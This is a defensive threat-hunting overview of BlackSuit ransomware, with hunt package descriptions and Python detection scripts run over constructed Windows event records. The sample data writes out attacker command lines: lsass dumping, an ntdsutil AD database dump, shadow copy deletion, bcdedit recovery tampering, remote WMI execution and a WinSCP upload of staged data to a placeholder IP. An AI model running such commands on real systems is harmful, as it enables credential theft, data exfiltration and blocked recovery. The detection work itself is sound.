Threat Overview - BlackSuit Ransomware
BlackSuit ransomware has established itself as a significant threat since its emergence in May 2023. Operated by former members of the Royal ransomware group, which itself split off from the infamous Conti gang, BlackSuit is a continuation and evolution of those groups' tradecraft. Several operators use the ransomware under a ransomware-as-a-service (RaaS) model, bringing extensive experience and advanced methods to attacks on a variety of sectors, with a particular focus on critical infrastructure, health care, construction, manufacturing and industrial goods. Its double-extortion strategy pairs data encryption with data exfiltration, pressuring victims to pay hefty ransoms under the threat of a leak. Most recently, the cybersecurity news site BleepingComputer reported that BlackSuit was responsible for taking the U.S.-based information technology (IT) company CDK Global offline, causing massive outages for users of its products, such as car dealerships. The outage was extended beyond the original incident by a second incident that occurred while the organization was bringing its services back online.
Hunt Packages
First Time Script Or Sysinternals Execution - Registry Key Modification
This package is designed to capture the first execution of scripts and Sysinternals executables. The first time a user runs some scripts and most Windows Sysinternals programs, the user must accept the End User License Agreement. This can be done in two ways: 1) pass the -accepteula command-line argument, or 2) click Agree when the pop-up prompts. Either way, a registry value is written to record the acceptance (for Sysinternals tools, an EulaAccepted value under HKCU\Software\Sysinternals\<Tool>), and the prompt does not appear the next time the program is run. That first-run marker on a host where the tool has never been used is a useful signal that someone new is operating there.
Autorun or ASEP Registry Key Modification
A common way for adversaries and malicious software alike to achieve persistence is to add a program to the Startup folder or to reference it from a Registry run key. An entry in the Registry "run keys" or the Startup folder causes the referenced program to be executed when a user logs in. These locations are often used for legitimate purposes; when used maliciously, however, the key name or value is often obviously suspicious, for example a random-looking name, or an executable loaded from a temp or public folder.
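The two registry-centred packages above (first-run EULA acceptance and autorun/ASEP writes) can be hunted from the same Sysmon feed. The following is an added example, not code from the hunt packages or from the HUNTER platform: it runs both checks over a handful of constructed Sysmon-style records (Event ID 1 process creation, Event ID 13 registry value set). The sample events, the `looks_random` heuristic and its thresholds, and the list of "suspicious" launch paths are this example's own assumptions.

```python
"""Hunt for first-run EULA acceptance and autorun (ASEP) registry writes.

Added example; not part of the hunt package content above. Input records are
constructed Sysmon-style events: Event ID 1 (process creation) and Event ID 13
(registry value set). Field names follow Sysmon's XML schema; the values are
made up for illustration.
"""
import re

# Constructed sample telemetry (not real events).
EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\Temp\PsExec64.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Sysinternals\PsExec\EulaAccepted",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 13, "Image": r"C:\Users\Public\update.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\xq7Kd2pL",
     "Details": r"C:\Users\Public\update.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Microsoft OneDrive\OneDriveSetup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Sysinternals tools record acceptance under HKCU\Software\Sysinternals\<Tool>\EulaAccepted.
EULA_VALUE = re.compile(r"\\Software\\Sysinternals\\[^\\]+\\EulaAccepted$", re.I)
# -accepteula (or /accepteula) on the command line pre-accepts the licence.
EULA_SWITCH = re.compile(r"(^|\s)[-/]accepteula(\s|$)", re.I)
# Run keys (ASEP) under CurrentVersion; the value name is the last path element.
ASEP_VALUE = re.compile(
    r"\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)\\(?P<name>[^\\]+)$", re.I)
# Launch paths that a legitimate installer rarely uses for a persistent entry (assumption).
SUSPICIOUS_PATH = re.compile(r"\\(Temp|Public|ProgramData|Downloads)\\", re.I)


def looks_random(name):
    """Crude heuristic (an assumption, not a vendor rule): a value name mixing
    upper and lower case with at least two digits is treated as generated."""
    digits = sum(c.isdigit() for c in name)
    return (len(name) >= 8 and digits >= 2
            and any(c.islower() for c in name) and any(c.isupper() for c in name))


def hunt(events):
    """Return (finding, artefact) tuples for the events that match."""
    findings = []
    for e in events:
        if e["EventID"] == 1 and EULA_SWITCH.search(e.get("CommandLine", "")):
            findings.append(("first_run_eula_switch", e["Image"]))
        elif e["EventID"] == 13:
            target = e["TargetObject"]
            if EULA_VALUE.search(target):
                findings.append(("first_run_eula_registry", e["Image"]))
            asep = ASEP_VALUE.search(target)
            if asep:
                reasons = []
                if SUSPICIOUS_PATH.search(e.get("Details", "")):
                    reasons.append("suspicious_path")
                if looks_random(asep.group("name")):
                    reasons.append("random_name")
                if reasons:  # benign software writes Run keys too; require a reason
                    findings.append(("asep_write:" + ",".join(reasons), target))
    return findings


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(*finding)
```

Run as-is, it reports the PsExec EulaAccepted write, the procdump `-accepteula` launch and the `Run\xq7Kd2pL` value pointing into `C:\Users\Public`, and stays silent on the OneDrive Run entry. In a real hunt the image that wrote the EulaAccepted value (here `C:\Windows\Temp\PsExec64.exe`) is usually the more interesting field than the value itself, because it tells you where the tool was dropped.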
Possible Kerberoasting - Ticket Granting Service (TGS) Request Without Login
This content is designed to detect when an account requests a Ticket Granting Service (TGS) ticket (event 4769) without a corresponding Ticket Granting Ticket (TGT) request (event 4768) for that account, which suggests the TGT in use was obtained elsewhere rather than through a normal logon.
Remote WMI Command Attempt
This hunt searches for wmic.exe being launched with parameters that operate on remote systems (the /node: switch). This can uncover an attacker abusing WMI to execute commands remotely or simply to gather information about other hosts.
Dump Active Directory Database with NTDSUtil - Potential Credential Dumping
This content is designed to identify when NTDSutil.exe is used to create a full backup of active directory. This technique is utilized by the Conti ransomware and Trickbot malware to steal data from a compromised host.
Suspicious bcdedit Activity - Potential Ransomware
BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to use bcdedit to modify the boot configuration so that the victim cannot recover, for example by disabling Windows Recovery (recoveryenabled no) or forcing the system to ignore boot failures. The intent of this package is to identify bcdedit being run with several common malicious arguments, such as delete and safeboot.
WinSCP Session Created - Possible Data Exfil
This hunt package is designed to capture WinSCP being driven from its command-line interface (winscp.com with /command or /script arguments) to open a transfer session, a pattern seen when operators push staged data out of the environment.
Possible Kerberoasting - Encryption Downgrade Attack
This use case is designed to detect when a Ticket Granting Service (TGS) ticket is requested with RC4 encryption (event 4769 with TicketEncryptionType 0x17). RC4-HMAC tickets are keyed with the service account's NT hash and are far cheaper to crack offline than AES tickets, so Kerberoasting tools request them deliberately.
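Both Kerberoasting packages above (TGS request without a TGT, and the RC4 encryption downgrade) correlate the same two Security log events, so one script serves both. The following is an added example, not the hunt packages' detection logic: it replays constructed 4768/4769 records in time order, remembers the most recent TGT per account and source address, and flags service-ticket requests that have no TGT within the assumed ticket lifetime or that were issued with RC4 to a user service account. The 10-hour window, the exclusion of krbtgt and computer accounts, and the sample events are this example's assumptions.

```python
"""Correlate Kerberos TGS requests (4769) with TGT requests (4768) to hunt
Kerberoasting. Added example; not part of the hunt package content above.

Two checks, both described in the packages above:
  1. a successful 4769 for an account/source IP with no 4768 seen in the
     preceding TGT lifetime (ticket-granting service request without login);
  2. a 4769 whose TicketEncryptionType is 0x17 (RC4-HMAC) for a service that
     is a user account rather than krbtgt or a computer account ($), i.e. an
     encryption downgrade that makes the ticket crackable offline.
Event field names follow the Windows Security log; the records are constructed.
"""
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
# Default domain MaxTicketAge is 10 hours; used as the correlation window (assumption).
TGT_LIFETIME = timedelta(hours=10)

# Constructed sample events (not real telemetry). Times are ISO 8601.
LOGS = [
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.15",
     "TimeCreated": "2024-06-20T08:00:00"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "FS01$",
     "IpAddress": "::ffff:10.0.0.15", "TicketEncryptionType": "0x12", "Status": "0x0",
     "TimeCreated": "2024-06-20T08:05:00"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "IpAddress": "::ffff:10.0.0.15", "TicketEncryptionType": "0x17", "Status": "0x0",
     "TimeCreated": "2024-06-20T08:06:00"},
    # bob requests a service ticket before any TGT was issued to him from this host
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_backup",
     "IpAddress": "::ffff:10.0.0.99", "TicketEncryptionType": "0x17", "Status": "0x0",
     "TimeCreated": "2024-06-20T09:30:00"},
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.99",
     "TimeCreated": "2024-06-20T09:45:00"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.0.99", "TicketEncryptionType": "0x17", "Status": "0x0",
     "TimeCreated": "2024-06-20T09:46:00"},
]


def account(name):
    """4769 carries user@REALM while 4768 carries the bare name; normalise."""
    return name.split("@")[0].lower()


def hunt_kerberoasting(events, tgt_lifetime=TGT_LIFETIME):
    """Return (finding, account, service) tuples."""
    ordered = sorted(events, key=lambda e: e["TimeCreated"])
    last_tgt = {}  # (account, source ip) -> time of the most recent 4768
    findings = []
    for e in ordered:
        acct = account(e["TargetUserName"])
        key = (acct, e["IpAddress"])
        ts = datetime.fromisoformat(e["TimeCreated"])
        if e["EventID"] == 4768:
            last_tgt[key] = ts
            continue
        if e["EventID"] != 4769 or e.get("Status") != "0x0":
            continue  # only successful service-ticket requests matter here
        svc = e["ServiceName"]
        seen = last_tgt.get(key)
        if seen is None or ts - seen > tgt_lifetime:
            findings.append(("tgs_without_tgt", acct, svc))
        if (e.get("TicketEncryptionType") == RC4_HMAC
                and svc.lower() != "krbtgt" and not svc.endswith("$")):
            findings.append(("rc4_service_ticket", acct, svc))
    return findings


if __name__ == "__main__":
    for finding in hunt_kerberoasting(LOGS):
        print(*finding)
```

Two caveats a hunter should keep in mind before trusting either finding. The 4768 for an account is written by whichever domain controller issued the TGT, so the "no TGT" check is only meaningful over logs aggregated from every DC in the domain; a single-DC feed produces false positives. And RC4 service tickets are normal wherever the service account has no AES keys configured (msDS-SupportedEncryptionTypes), so baseline which SPNs routinely return 0x17 and alert on an account suddenly collecting many of them, rather than on any single 0x17 ticket.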
Remote Process Instantiation via WMI
This use case is meant to identify wmic.exe being launched with parameters to spawn a process on a remote system (/node: together with process call create).
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows Volume Shadow Copies before it begins encrypting data on the victim host, so that the built-in restore points cannot be used for recovery. This is typically done with PowerShell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command-line arguments containing delete and variations of shadow.
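The remaining packages above (remote WMI command and remote process instantiation, the ntdsutil IFM dump, bcdedit tampering, WinSCP command-line sessions, and shadow copy deletion) are all process command-line hunts, so one rule table covers them. The following is an added example, not the vendor's detection content: the regular expressions are this example's own reading of each package description, and the (image, command line) records are constructed in the shape Sysmon Event ID 1 or Security event 4688 with command-line auditing would provide.

```python
"""Command-line hunting rules for the remaining packages above (remote WMI,
ntdsutil IFM dump, bcdedit tampering, WinSCP command-line sessions, shadow
copy deletion). Added example; the rule patterns are this example's own
reading of the package descriptions, not the vendor's detection logic.
Input is constructed (image, command line) pairs such as Sysmon Event ID 1
or Security 4688 would provide.
"""
import re

# (rule name, image regex, command-line regex). Command lines are matched
# case-insensitively; DOTALL lets the lookaheads span the whole string.
RULES = [
    ("remote_wmi_command", r"wmic\.exe$", r"/node:"),
    ("remote_wmi_process_create", r"wmic\.exe$", r"/node:.*process\s+call\s+create"),
    # "activate instance ntds" / "ifm" / "create full" copies NTDS.dit plus the SYSTEM hive
    ("ntdsutil_ifm_dump", r"ntdsutil\.exe$", r"ac\S*\s+i\S*\s+ntds.*(ifm|create\s+full)"),
    ("bcdedit_recovery_tamper", r"bcdedit\.exe$",
     r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures|safeboot|/delete\b)"),
    ("winscp_cli_session", r"winscp\.(com|exe)$",
     r"(/command|/script|\bopen\s+(sftp|scp|ftps?|webdav|s3)://)"),
    ("shadow_copy_delete", r"(powershell|pwsh|wmic|vssadmin|vssvc)\.exe$",
     r"(?=.*delete)(?=.*shadow)"),
]

# Constructed sample process-creation records (not real telemetry).
SAMPLE_PROCESSES = [
    (r"C:\Windows\System32\wbem\WMIC.exe",
     r'wmic /node:"FS01" /user:CORP\admin process call create "cmd.exe /c whoami"'),
    (r"C:\Windows\System32\wbem\WMIC.exe", r"wmic /node:10.0.0.7 os get caption,version"),
    (r"C:\Windows\System32\ntdsutil.exe",
     r'ntdsutil "ac i ntds" "ifm" "create full C:\Temp\ntds" q q'),
    (r"C:\Windows\System32\bcdedit.exe", r"bcdedit /set {default} recoveryenabled No"),
    (r"C:\Windows\System32\bcdedit.exe",
     r"bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    (r"C:\Program Files (x86)\WinSCP\WinSCP.com",
     r'winscp.com /command "open sftp://svc:pw@203.0.113.5/" "put C:\Users\Public\a.7z" "exit"'),
    (r"C:\Windows\System32\vssadmin.exe", r"vssadmin delete shadows /all /quiet"),
    (r"C:\Windows\System32\wbem\WMIC.exe", r"wmic shadowcopy delete"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -c Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete()}"),
    (r"C:\Windows\System32\vssadmin.exe", r"vssadmin list shadows"),   # benign
    (r"C:\Windows\System32\wbem\WMIC.exe", r"wmic os get caption"),    # benign, local only
]


def hunt(processes):
    """Return (rule name, command line) for every rule each record matches."""
    hits = []
    for image, cmdline in processes:
        for name, image_pat, cmd_pat in RULES:
            if (re.search(image_pat, image, re.I)
                    and re.search(cmd_pat, cmdline, re.I | re.S)):
                hits.append((name, cmdline))
    return hits


if __name__ == "__main__":
    for name, cmdline in hunt(SAMPLE_PROCESSES):
        print(f"{name:28} {cmdline}")
```

The first WMIC record deliberately matches both WMI rules: the broad `/node:` rule catches any remote WMI use, while the narrower `process call create` rule is the one worth paging on. The shadow-copy rule uses two lookaheads instead of a fixed phrase so it catches `vssadmin delete shadows`, `wmic shadowcopy delete` and the PowerShell `Win32_Shadowcopy ... Delete()` form in one expression, while `vssadmin list shadows` (no delete) falls through. Attackers can defeat string matching with renamed binaries or obfuscated arguments, so these rules are a starting point for a hunt, not a substitute for blocking the underlying actions.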